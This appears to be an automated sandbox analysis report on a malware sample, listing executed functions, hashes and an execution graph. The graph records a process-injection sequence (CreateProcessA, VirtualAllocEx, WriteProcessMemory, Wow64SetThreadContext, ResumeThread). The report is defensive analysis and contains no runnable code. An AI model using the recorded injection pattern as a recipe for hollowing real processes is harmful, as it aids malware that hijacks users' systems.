                                                            Wow64 process (32bit):false
                                                            Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
                                                            Imagebase:0x7ff722870000
                                                            File size:676'768 bytes
                                                            MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                                                            Has elevated privileges:false
                                                            Has administrator privileges:false
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            Disassembly

                                                            Reset < >

                                                              Execution Graph

                                                              Execution Coverage:10.3%
                                                              Dynamic/Decrypted Code Coverage:100%
                                                              Signature Coverage:0%
                                                              Total number of Nodes:186
                                                              Total number of Limit Nodes:18
                                                              execution_graph 37117 1294668 37118 129467a 37117->37118 37119 1294686 37118->37119 37121 1294779 37118->37121 37122 129479d 37121->37122 37126 1294878 37122->37126 37130 1294888 37122->37130 37128 12948af 37126->37128 37127 129498c 37128->37127 37134 129449c 37128->37134 37131 12948af 37130->37131 37132 129449c CreateActCtxA 37131->37132 37133 129498c 37131->37133 37132->37133 37135 1295918 CreateActCtxA 37134->37135 37137 12959db 37135->37137 37137->37137 37163 129d5c8 37164 129d60e GetCurrentProcess 37163->37164 37166 129d659 37164->37166 37167 129d660 GetCurrentThread 37164->37167 37166->37167 37168 129d69d GetCurrentProcess 37167->37168 37169 129d696 37167->37169 37170 129d6d3 37168->37170 37169->37168 37171 129d6fb GetCurrentThreadId 37170->37171 37172 129d72c 37171->37172 37138 736d430 37139 736d475 Wow64SetThreadContext 37138->37139 37141 736d4bd 37139->37141 37142 736def0 37143 736df3b ReadProcessMemory 37142->37143 37145 736df7f 37143->37145 37173 7341fd8 37177 7342010 37173->37177 37182 7342000 37173->37182 37174 7341ff7 37178 7342019 37177->37178 37187 734204e 37178->37187 37195 7342058 37178->37195 37179 734203e 37179->37174 37183 734200e 37182->37183 37185 734204e DrawTextExW 37183->37185 37186 7342058 DrawTextExW 37183->37186 37184 734203e 37184->37174 37185->37184 37186->37184 37188 7342082 37187->37188 37189 7342093 37187->37189 37188->37179 37189->37188 37203 7342435 37189->37203 37208 734b600 37189->37208 37214 734b610 37189->37214 37220 7342380 37189->37220 37225 7342370 37189->37225 37196 7342082 37195->37196 37197 7342093 37195->37197 37196->37179 37197->37196 37198 7342435 DrawTextExW 37197->37198 37199 7342370 DrawTextExW 37197->37199 37200 7342380 DrawTextExW 37197->37200 37201 734b610 DrawTextExW 37197->37201 37202 734b600 DrawTextExW 37197->37202 37198->37196 37199->37196 37200->37196 37201->37196 37202->37196 37204 73423f3 37203->37204 37204->37203 37205 73424ae 37204->37205 37230 7342c10 37204->37230 37235 7342c00 37204->37235 37205->37188 37209 734b66d 37208->37209 37211 734b636 37208->37211 37212 734b699 37209->37212 37285 734b790 37209->37285 37210 734b68f 37210->37188 37211->37188 37212->37188 37215 734b66d 37214->37215 37217 734b636 37214->37217 37218 734b699 37215->37218 37219 734b790 DrawTextExW 37215->37219 37216 734b68f 37216->37188 37217->37188 37218->37188 37219->37216 37221 73423a8 37220->37221 37222 73424ae 37221->37222 37223 7342c10 DrawTextExW 37221->37223 37224 7342c00 DrawTextExW 37221->37224 37222->37188 37223->37222 37224->37222 37226 7342380 37225->37226 37227 73424ae 37226->37227 37228 7342c10 DrawTextExW 37226->37228 37229 7342c00 DrawTextExW 37226->37229 37227->37188 37228->37227 37229->37227 37231 7342c26 37230->37231 37240 7343078 37231->37240 37244 7343068 37231->37244 37232 7342c9c 37232->37205 37236 7342c10 37235->37236 37238 7343078 DrawTextExW 37236->37238 37239 7343068 DrawTextExW 37236->37239 37237 7342c9c 37237->37205 37238->37237 37239->37237 37249 73430b8 37240->37249 37254 73430a8 37240->37254 37241 7343096 37241->37232 37245 7343078 37244->37245 37247 73430b8 DrawTextExW 37245->37247 37248 73430a8 DrawTextExW 37245->37248 37246 7343096 37246->37232 37247->37246 37248->37246 37250 73430e9 37249->37250 37251 7343116 37250->37251 37259 7343138 37250->37259 37264 7343129 37250->37264 37251->37241 37255 73430e9 37254->37255 37256 7343116 37255->37256 37257 7343138 DrawTextExW 37255->37257 37258 7343129 DrawTextExW 37255->37258 37256->37241 37257->37256 37258->37256 37261 7343159 37259->37261 37260 734316e 37260->37251 37261->37260 37269 73412e8 37261->37269 37263 73431d9 37266 7343138 37264->37266 37265 734316e 37265->37251 37266->37265 37267 73412e8 DrawTextExW 37266->37267 37268 73431d9 37267->37268 37271 73412f3 37269->37271 37270 73451a9 37270->37263 37271->37270 37275 7345d20 37271->37275 37278 7345d10 37271->37278 37272 73452bc 37272->37263 37281 73447bc 37275->37281 37279 7345d3d 37278->37279 37280 73447bc DrawTextExW 37278->37280 37279->37272 37280->37279 37282 7345d58 DrawTextExW 37281->37282 37284 7345d3d 37282->37284 37284->37272 37286 734b7c4 37285->37286 37290 734bd70 37286->37290 37296 734bd63 37286->37296 37287 734b7e0 37287->37210 37292 734bd95 37290->37292 37291 734bdb9 37291->37287 37292->37291 37302 734f5e0 37292->37302 37307 734f608 37292->37307 37293 734be76 37297 734bd95 37296->37297 37298 734bdb9 37297->37298 37300 734f5e0 DrawTextExW 37297->37300 37301 734f608 DrawTextExW 37297->37301 37298->37287 37299 734be76 37300->37299 37301->37299 37303 734f620 37302->37303 37304 734f624 37303->37304 37312 734fc00 37303->37312 37316 734fbf2 37303->37316 37304->37293 37308 734f620 37307->37308 37309 734f624 37308->37309 37310 734fc00 DrawTextExW 37308->37310 37311 734fbf2 DrawTextExW 37308->37311 37309->37293 37310->37309 37311->37309 37314 734fc30 37312->37314 37313 734fd7f 37313->37304 37314->37313 37315 7343138 DrawTextExW 37314->37315 37315->37313 37318 734fc30 37316->37318 37317 734fd7f 37317->37304 37318->37317 37319 7343138 DrawTextExW 37318->37319 37319->37317 37146 7340de0 37147 7340de5 37146->37147 37149 7340eb0 37147->37149 37151 7341388 37147->37151 37152 734138b 37151->37152 37153 7340e85 37152->37153 37154 73416ff GetCurrentThreadId 37152->37154 37154->37153 37320 736d940 37321 736d980 VirtualAllocEx 37320->37321 37323 736d9bd 37321->37323 37324 736d380 37325 736d3c0 ResumeThread 37324->37325 37327 736d3f1 37325->37327 37328 736da00 37329 736da48 WriteProcessMemory 37328->37329 37331 736da9f 37329->37331 37155 129ae30 37158 129af19 37155->37158 37156 129ae3f 37159 129af5c 37158->37159 37160 129af39 37158->37160 37159->37156 37160->37159 37161 129b160 GetModuleHandleW 37160->37161 37162 129b18d 37161->37162 37162->37156 37332 129d810 DuplicateHandle 37333 129d8a6 37332->37333 37334 734b408 37336 734b427 37334->37336 37335 734b5ad 37336->37335 37339 734b5b8 37336->37339 37343 734b5c8 37336->37343 37340 734b5d1 37339->37340 37341 7342058 DrawTextExW 37340->37341 37342 734b5f5 37341->37342 37342->37336 37344 734b5d1 37343->37344 37345 7342058 DrawTextExW 37344->37345 37346 734b5f5 37345->37346 37346->37336 37347 736e088 37348 736e111 CreateProcessA 37347->37348 37350 736e2d3 37348->37350 37350->37350

                                                              Executed Functions

                                                              Function 07367F62 Relevance: .1, Instructions: 63COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1379812199.0000000007360000.00000040.00000800.00020000.00000000.sdmp, Offset: 07360000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7360000_n2pGr8w21V.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: d8de3501f761ae07cc585eb2faac0d29a043fd3389892748a9f4d0837f2340c3
                                                              • Instruction ID: 8547a37df48072439ad20ca68ba1f35acb40ee146d4c7ad72ce1976731a100e3
                                                              • Opcode Fuzzy Hash: d8de3501f761ae07cc585eb2faac0d29a043fd3389892748a9f4d0837f2340c3
                                                              • Instruction Fuzzy Hash: BB21E8B1D146599BEB18CF97C9153DEFBF7AF89300F04C06AD409B6268DB7409468F54
                                                              Function 07367F70 Relevance: .1, Instructions: 56COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1379812199.0000000007360000.00000040.00000800.00020000.00000000.sdmp, Offset: 07360000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7360000_n2pGr8w21V.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 22eaa3ca193bc39f289525c705ddf4b853af720c6591f0a0f89348c03771c591
                                                              • Instruction ID: fdb58849d06698aec35cdffb9d095157b6389d0b88320f20342dd1172c8bb32e
                                                              • Opcode Fuzzy Hash: 22eaa3ca193bc39f289525c705ddf4b853af720c6591f0a0f89348c03771c591
                                                              • Instruction Fuzzy Hash: 9F21E7B1D006199BEB18CF9BC8047DEFAF7BFC9300F14C06AD40966258DBB509468F90
                                                              Function 0129D5B9 Relevance: 6.1, APIs: 4, Instructions: 134threadCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 342 129d5b9-129d657 GetCurrentProcess 346 129d659-129d65f 342->346 347 129d660-129d694 GetCurrentThread 342->347 346->347 348 129d69d-129d6d1 GetCurrentProcess 347->348 349 129d696-129d69c 347->349 350 129d6da-129d6f5 call 129d797 348->350 351 129d6d3-129d6d9 348->351 349->348 355 129d6fb-129d72a GetCurrentThreadId 350->355 351->350 356 129d72c-129d732 355->356 357 129d733-129d795 355->357 356->357
                                                              APIs
                                                              • GetCurrentProcess.KERNEL32 ref: 0129D646
                                                              • GetCurrentThread.KERNEL32 ref: 0129D683
                                                              • GetCurrentProcess.KERNEL32 ref: 0129D6C0
                                                              • GetCurrentThreadId.KERNEL32 ref: 0129D719
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1368475142.0000000001290000.00000040.00000800.00020000.00000000.sdmp, Offset: 01290000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_1290000_n2pGr8w21V.jbxd
                                                              Similarity
                                                              • API ID: Current$ProcessThread
                                                              • String ID:
                                                              • API String ID: 2063062207-0
                                                              • Opcode ID: 3eb5940465d681321b39f25afd4e4aa844b5f030d01ea3cc38b77dde76c7a504
                                                              • Instruction ID: bf8ab2d1bb575238b56b16f076c7323aaac616fb26c91334fadac99738033066
                                                              • Opcode Fuzzy Hash: 3eb5940465d681321b39f25afd4e4aa844b5f030d01ea3cc38b77dde76c7a504
                                                              • Instruction Fuzzy Hash: BD5156B09007098FEB14DFAAE548BAEBBF1FF88314F208459D419AB290DB346945CF65
                                                              Function 0129D5C8 Relevance: 6.1, APIs: 4, Instructions: 128threadCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 364 129d5c8-129d657 GetCurrentProcess 368 129d659-129d65f 364->368 369 129d660-129d694 GetCurrentThread 364->369 368->369 370 129d69d-129d6d1 GetCurrentProcess 369->370 371 129d696-129d69c 369->371 372 129d6da-129d6f5 call 129d797 370->372 373 129d6d3-129d6d9 370->373 371->370 377 129d6fb-129d72a GetCurrentThreadId 372->377 373->372 378 129d72c-129d732 377->378 379 129d733-129d795 377->379 378->379
                                                              APIs
                                                              • GetCurrentProcess.KERNEL32 ref: 0129D646
                                                              • GetCurrentThread.KERNEL32 ref: 0129D683
                                                              • GetCurrentProcess.KERNEL32 ref: 0129D6C0
                                                              • GetCurrentThreadId.KERNEL32 ref: 0129D719
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1368475142.0000000001290000.00000040.00000800.00020000.00000000.sdmp, Offset: 01290000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_1290000_n2pGr8w21V.jbxd
                                                              Similarity
                                                              • API ID: Current$ProcessThread
                                                              • String ID:
                                                              • API String ID: 2063062207-0
                                                              • Opcode ID: 4566a9bd9fc9ae29adf8ede3d9ebb6b2bf93c485b070e2ae8785d63f108ab7d6
                                                              • Instruction ID: 47a3b79cde21816b221b7b627a8cdb9080e5caa8d7a181d0a38f5537f63b8865
                                                              • Opcode Fuzzy Hash: 4566a9bd9fc9ae29adf8ede3d9ebb6b2bf93c485b070e2ae8785d63f108ab7d6
                                                              • Instruction Fuzzy Hash: 6E5146B09007098FEB18DFAAD548B9EBBF1FF88314F208419D519AB390DB746945CF65
                                                              Function 0736E07C Relevance: 1.7, APIs: 1, Instructions: 249processCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 616 736e07c-736e11d 618 736e156-736e176 616->618 619 736e11f-736e129 616->619 626 736e1af-736e1de 618->626 627 736e178-736e182 618->627 619->618 620 736e12b-736e12d 619->620 621 736e150-736e153 620->621 622 736e12f-736e139 620->622 621->618 624 736e13d-736e14c 622->624 625 736e13b 622->625 624->624 628 736e14e 624->628 625->624 635 736e217-736e2d1 CreateProcessA 626->635 636 736e1e0-736e1ea 626->636 627->626 629 736e184-736e186 627->629 628->621 631 736e188-736e192 629->631 632 736e1a9-736e1ac 629->632 633 736e196-736e1a5 631->633 634 736e194 631->634 632->626 633->633 637 736e1a7 633->637 634->633 647 736e2d3-736e2d9 635->647 648 736e2da-736e360 635->648 636->635 638 736e1ec-736e1ee 636->638 637->632 640 736e1f0-736e1fa 638->640 641 736e211-736e214 638->641 642 736e1fe-736e20d 640->642 643 736e1fc 640->643 641->635 642->642 645 736e20f 642->645 643->642 645->641 647->648 658 736e362-736e366 648->658 659 736e370-736e374 648->659 658->659 662 736e368 658->662 660 736e376-736e37a 659->660 661 736e384-736e388 659->661 660->661 663 736e37c 660->663 664 736e38a-736e38e 661->664 665 736e398-736e39c 661->665 662->659 663->661 664->665 666 736e390 664->666 667 736e3ae-736e3b5 665->667 668 736e39e-736e3a4 665->668 666->665 669 736e3b7-736e3c6 667->669 670 736e3cc 667->670 668->667 669->670 671 736e3cd 670->671 671->671
                                                              APIs
                                                              • CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 0736E2BE
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1379812199.0000000007360000.00000040.00000800.00020000.00000000.sdmp, Offset: 07360000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7360000_n2pGr8w21V.jbxd
                                                              Similarity
                                                              • API ID: CreateProcess
                                                              • String ID:
                                                              • API String ID: 963392458-0
                                                              • Opcode ID: b19011487f367c7e1079df8da93c1a20246368feb0c4c9500e47002f71f5fb7c
                                                              • Instruction ID: d967db965b6b6e9808b45829e485fb83d5aaf296ea8fcd09521766a0e536eec6
                                                              • Opcode Fuzzy Hash: b19011487f367c7e1079df8da93c1a20246368feb0c4c9500e47002f71f5fb7c
                                                              • Instruction Fuzzy Hash: 80A17DB5D4031ADFEB20DF68C844BEDBBB2BF48310F1481A9D819A7244DB759985CF91
                                                              Function 0736E088 Relevance: 1.7, APIs: 1, Instructions: 243processCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 673 736e088-736e11d 675 736e156-736e176 673->675 676 736e11f-736e129 673->676 683 736e1af-736e1de 675->683 684 736e178-736e182 675->684 676->675 677 736e12b-736e12d 676->677 678 736e150-736e153 677->678 679 736e12f-736e139 677->679 678->675 681 736e13d-736e14c 679->681 682 736e13b 679->682 681->681 685 736e14e 681->685 682->681 692 736e217-736e2d1 CreateProcessA 683->692 693 736e1e0-736e1ea 683->693 684->683 686 736e184-736e186 684->686 685->678 688 736e188-736e192 686->688 689 736e1a9-736e1ac 686->689 690 736e196-736e1a5 688->690 691 736e194 688->691 689->683 690->690 694 736e1a7 690->694 691->690 704 736e2d3-736e2d9 692->704 705 736e2da-736e360 692->705 693->692 695 736e1ec-736e1ee 693->695 694->689 697 736e1f0-736e1fa 695->697 698 736e211-736e214 695->698 699 736e1fe-736e20d 697->699 700 736e1fc 697->700 698->692 699->699 702 736e20f 699->702 700->699 702->698 704->705 715 736e362-736e366 705->715 716 736e370-736e374 705->716 715->716 719 736e368 715->719 717 736e376-736e37a 716->717 718 736e384-736e388 716->718 717->718 720 736e37c 717->720 721 736e38a-736e38e 718->721 722 736e398-736e39c 718->722 719->716 720->718 721->722 723 736e390 721->723 724 736e3ae-736e3b5 722->724 725 736e39e-736e3a4 722->725 723->722 726 736e3b7-736e3c6 724->726 727 736e3cc 724->727 725->724 726->727 728 736e3cd 727->728 728->728
                                                              APIs
                                                              • CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 0736E2BE
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1379812199.0000000007360000.00000040.00000800.00020000.00000000.sdmp, Offset: 07360000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7360000_n2pGr8w21V.jbxd
                                                              Similarity
                                                              • API ID: CreateProcess
                                                              • String ID:
                                                              • API String ID: 963392458-0
                                                              • Opcode ID: be5f289da23c246f8524be4fe5f4dff4d722ff45fa9a27e319dd492381ebc374
                                                              • Instruction ID: f7d169f266eb2bfc77ec753282bf9304bad140985b7ead8790d2ae2f97423bde
                                                              • Opcode Fuzzy Hash: be5f289da23c246f8524be4fe5f4dff4d722ff45fa9a27e319dd492381ebc374
                                                              • Instruction Fuzzy Hash: A1917CB5D4031ACFEB20CF68C844BEDBBB2BF48310F1481A9E819A7244DB759985CF91
                                                              Function 0129AF19 Relevance: 1.7, APIs: 1, Instructions: 202COMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 730 129af19-129af37 731 129af39-129af46 call 12998a0 730->731 732 129af63-129af67 730->732 739 129af48 731->739 740 129af5c 731->740 733 129af69-129af73 732->733 734 129af7b-129afbc 732->734 733->734 741 129afc9-129afd7 734->741 742 129afbe-129afc6 734->742 785 129af4e call 129b1b0 739->785 786 129af4e call 129b1c0 739->786 740->732 744 129afd9-129afde 741->744 745 129affb-129affd 741->745 742->741 743 129af54-129af56 743->740 746 129b098-129b158 743->746 748 129afe9 744->748 749 129afe0-129afe7 call 129a270 744->749 747 129b000-129b007 745->747 780 129b15a-129b15d 746->780 781 129b160-129b18b GetModuleHandleW 746->781 751 129b009-129b011 747->751 752 129b014-129b01b 747->752 750 129afeb-129aff9 748->750 749->750 750->747 751->752 754 129b028-129b031 call 129a280 752->754 755 129b01d-129b025 752->755 761 129b03e-129b043 754->761 762 129b033-129b03b 754->762 755->754 763 129b061-129b06e 761->763 764 129b045-129b04c 761->764 762->761 770 129b091-129b097 763->770 771 129b070-129b08e 763->771 764->763 766 129b04e-129b05e call 129a290 call 129a2a0 764->766 766->763 771->770 780->781 782 129b18d-129b193 781->782 783 129b194-129b1a8 781->783 782->783 785->743 786->743
                                                              APIs
                                                              • GetModuleHandleW.KERNEL32(00000000), ref: 0129B17E
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1368475142.0000000001290000.00000040.00000800.00020000.00000000.sdmp, Offset: 01290000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_1290000_n2pGr8w21V.jbxd
                                                              Similarity
                                                              • API ID: HandleModule
                                                              • String ID:
                                                              • API String ID: 4139908857-0
                                                              • Opcode ID: be5c26d523d38c8b1152acd5c2836faadf40665b5cd8dcaff9cfbc273470e849
                                                              • Instruction ID: e3d95f6301d01927a4af097fd48a12564763100ea995912a6834984ce8d44e2f
                                                              • Opcode Fuzzy Hash: be5c26d523d38c8b1152acd5c2836faadf40665b5cd8dcaff9cfbc273470e849
                                                              • Instruction Fuzzy Hash: 0B814870A10B468FDB24DF2DD4447AABBF1BF88304F00892DD19ADBA50D775E949CB90
                                                              Function 0129590C Relevance: 1.6, APIs: 1, Instructions: 99COMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 787 129590c-12959d9 CreateActCtxA 789 12959db-12959e1 787->789 790 12959e2-1295a3c 787->790 789->790 797 1295a4b-1295a4f 790->797 798 1295a3e-1295a41 790->798 799 1295a51-1295a5d 797->799 800 1295a60 797->800 798->797 799->800 802 1295a61 800->802 802->802
                                                              APIs
                                                              • CreateActCtxA.KERNEL32(?), ref: 012959C9
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1368475142.0000000001290000.00000040.00000800.00020000.00000000.sdmp, Offset: 01290000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_1290000_n2pGr8w21V.jbxd
                                                              Similarity
                                                              • API ID: Create
                                                              • String ID:
                                                              • API String ID: 2289755597-0
                                                              • Opcode ID: c8daabd1fe6663fe7d7e8c661c3e19d930485cd3062c0ac6f53f6124e7ee2319
                                                              • Instruction ID: 5274279160982dc7d4ea26597ee075104910b6dd1dce587efd28b10ef5c811cd
                                                              • Opcode Fuzzy Hash: c8daabd1fe6663fe7d7e8c661c3e19d930485cd3062c0ac6f53f6124e7ee2319
                                                              • Instruction Fuzzy Hash: A141DF71D10719CFEB24CFAAC884B9DBBF1BF48314F20816AD408AB255DB755986CF50
                                                              Function 0129449C Relevance: 1.6, APIs: 1, Instructions: 96COMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 803 129449c-12959d9 CreateActCtxA 806 12959db-12959e1 803->806 807 12959e2-1295a3c 803->807 806->807 814 1295a4b-1295a4f 807->814 815 1295a3e-1295a41 807->815 816 1295a51-1295a5d 814->816 817 1295a60 814->817 815->814 816->817 819 1295a61 817->819 819->819
                                                              APIs
                                                              • CreateActCtxA.KERNEL32(?), ref: 012959C9
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1368475142.0000000001290000.00000040.00000800.00020000.00000000.sdmp, Offset: 01290000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_1290000_n2pGr8w21V.jbxd
                                                              Similarity
                                                              • API ID: Create
                                                              • String ID:
                                                              • API String ID: 2289755597-0
                                                              • Opcode ID: 7fb28d76e364dda039d51669e509f1f7b314b6ca76d7390dabc9b600f2e3ec14
                                                              • Instruction ID: a67bd8df579728383e6d6e0206a0abc0fd70d71f02f525e2616508092b6b8b62
                                                              • Opcode Fuzzy Hash: 7fb28d76e364dda039d51669e509f1f7b314b6ca76d7390dabc9b600f2e3ec14
                                                              • Instruction Fuzzy Hash: 5F41EE70D10719CBEF24DFAAC884B8DBBF1BF48714F20806AD508AB251DB756986CF90
                                                              Function 0736D9F8 Relevance: 1.6, APIs: 1, Instructions: 74injectionCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • WriteProcessMemory.KERNEL32(?,?,00000000,?,?), ref: 0736DA90
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1379812199.0000000007360000.00000040.00000800.00020000.00000000.sdmp, Offset: 07360000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7360000_n2pGr8w21V.jbxd
                                                              Similarity
                                                              • API ID: MemoryProcessWrite
                                                              • String ID:
                                                              • API String ID: 3559483778-0
                                                              • Opcode ID: 478eb539f5e092287d97936337deb7f36b85f2e1dc2710d3612a8c8cf795f8d7
                                                              • Instruction ID: d6695ba264fa7ce256694b3b6c30b92b62fd373b814218f4237804034e8bd492
                                                              • Opcode Fuzzy Hash: 478eb539f5e092287d97936337deb7f36b85f2e1dc2710d3612a8c8cf795f8d7
                                                              • Instruction Fuzzy Hash: 222148B5D003499FDB10CFA9C845BDEBBF4FB48310F10842AE958A7240D7759941CBA0
                                                              Function 073447BC Relevance: 1.6, APIs: 1, Instructions: 72COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • DrawTextExW.USER32(?,?,?,?,?,?,?,?,?,?,?,?,?,07345D3D,?,?), ref: 07345DEF
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1379728429.0000000007340000.00000040.00000800.00020000.00000000.sdmp, Offset: 07340000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7340000_n2pGr8w21V.jbxd
                                                              Similarity
                                                              • API ID: DrawText
                                                              • String ID:
                                                              • API String ID: 2175133113-0
                                                              • Opcode ID: 262ec2dbbba91d7a02dda1b6fa69c27ff306185c87f2cfa4856b6f5d42c79395
                                                              • Instruction ID: 848e68a58c32e236f48963ec0c17798de2ca4271ce81e0804d73b345f150c367
                                                              • Opcode Fuzzy Hash: 262ec2dbbba91d7a02dda1b6fa69c27ff306185c87f2cfa4856b6f5d42c79395
                                                              • Instruction Fuzzy Hash: 9731E2B6D003499FDB14CF9AD884A9EBBF5FF48310F14842AE919A7210D775A954CFA0
                                                              Function 07345D50 Relevance: 1.6, APIs: 1, Instructions: 69COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • DrawTextExW.USER32(?,?,?,?,?,?,?,?,?,?,?,?,?,07345D3D,?,?), ref: 07345DEF
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1379728429.0000000007340000.00000040.00000800.00020000.00000000.sdmp, Offset: 07340000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7340000_n2pGr8w21V.jbxd
                                                              Similarity
                                                              • API ID: DrawText
                                                              • String ID:
                                                              • API String ID: 2175133113-0
                                                              • Opcode ID: fe0aecff65a8092578839b27559e71f55d52dd3f0b80625220fe0216bbef3560
                                                              • Instruction ID: 9041d75d30ac117c517db6a2ab697838e148cf301b1d5e3ed2ea87ed9d139545
                                                              • Opcode Fuzzy Hash: fe0aecff65a8092578839b27559e71f55d52dd3f0b80625220fe0216bbef3560
                                                              • Instruction Fuzzy Hash: E631E2B6D0020A9FDB14CF99D884ADEBBF5BF48320F14842AE819A7210D775A950CFA0
                                                              Function 0736DA00 Relevance: 1.6, APIs: 1, Instructions: 69injectionCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • WriteProcessMemory.KERNEL32(?,?,00000000,?,?), ref: 0736DA90
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1379812199.0000000007360000.00000040.00000800.00020000.00000000.sdmp, Offset: 07360000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7360000_n2pGr8w21V.jbxd
                                                              Similarity
                                                              • API ID: MemoryProcessWrite
                                                              • String ID:
                                                              • API String ID: 3559483778-0
                                                              • Opcode ID: b8ef0d12c1616828b7ae945bb6c55c29ef83212910da1e4f2cee178c42d5dc48
                                                              • Instruction ID: cb7881907f321c7682a2eb9dd19938eca30a50e2706b2ee6855999975dc5c36c
                                                              • Opcode Fuzzy Hash: b8ef0d12c1616828b7ae945bb6c55c29ef83212910da1e4f2cee178c42d5dc48
                                                              • Instruction Fuzzy Hash: A92135B5D003499FDB10DFAAC885BDEBBF5FB48310F50842AE918A7340D7799940CBA4
                                                              Function 0736D429 Relevance: 1.6, APIs: 1, Instructions: 68threadCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 0736D4AE
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1379812199.0000000007360000.00000040.00000800.00020000.00000000.sdmp, Offset: 07360000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7360000_n2pGr8w21V.jbxd
                                                              Similarity
                                                              • API ID: ContextThreadWow64
                                                              • String ID:
                                                              • API String ID: 983334009-0
                                                              • Opcode ID: 402ed574a789ff9202fc34228342125c49937d1d0af1e48851b338b05f15e498
                                                              • Instruction ID: ea20a6cc31d08357b0b1432d075fe2b7fabc5083a1c42c74153966cc6a3af343
                                                              • Opcode Fuzzy Hash: 402ed574a789ff9202fc34228342125c49937d1d0af1e48851b338b05f15e498
                                                              • Instruction Fuzzy Hash: 09214AB1D003099FDB10DFAAC4857EEBBF4EB48314F10842AD419A7240CB78A945CBA4
                                                              Function 0129D808 Relevance: 1.6, APIs: 1, Instructions: 67COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0129D897
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1368475142.0000000001290000.00000040.00000800.00020000.00000000.sdmp, Offset: 01290000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_1290000_n2pGr8w21V.jbxd
                                                              Similarity
                                                              • API ID: DuplicateHandle
                                                              • String ID:
                                                              • API String ID: 3793708945-0
                                                              • Opcode ID: f6219a316224655c832c86d4df487ecf901df72b60f31960b0169a0b3ce89980
                                                              • Instruction ID: c9d4d9fa5355f4371cc82d39ffd3eca1484e4c1b8c333a7a1f9e86ae490173ff
                                                              • Opcode Fuzzy Hash: f6219a316224655c832c86d4df487ecf901df72b60f31960b0169a0b3ce89980
                                                              • Instruction Fuzzy Hash: 0B21E6B5D003499FDB10CF9AD885AEEBBF4FB48320F14841AE958A7350D379A945CFA1
                                                              Function 0736DEE8 Relevance: 1.6, APIs: 1, Instructions: 66COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • ReadProcessMemory.KERNEL32(?,?,?,?,?), ref: 0736DF70
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1379812199.0000000007360000.00000040.00000800.00020000.00000000.sdmp, Offset: 07360000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7360000_n2pGr8w21V.jbxd
                                                              Similarity
                                                              • API ID: MemoryProcessRead
                                                              • String ID:
                                                              • API String ID: 1726664587-0
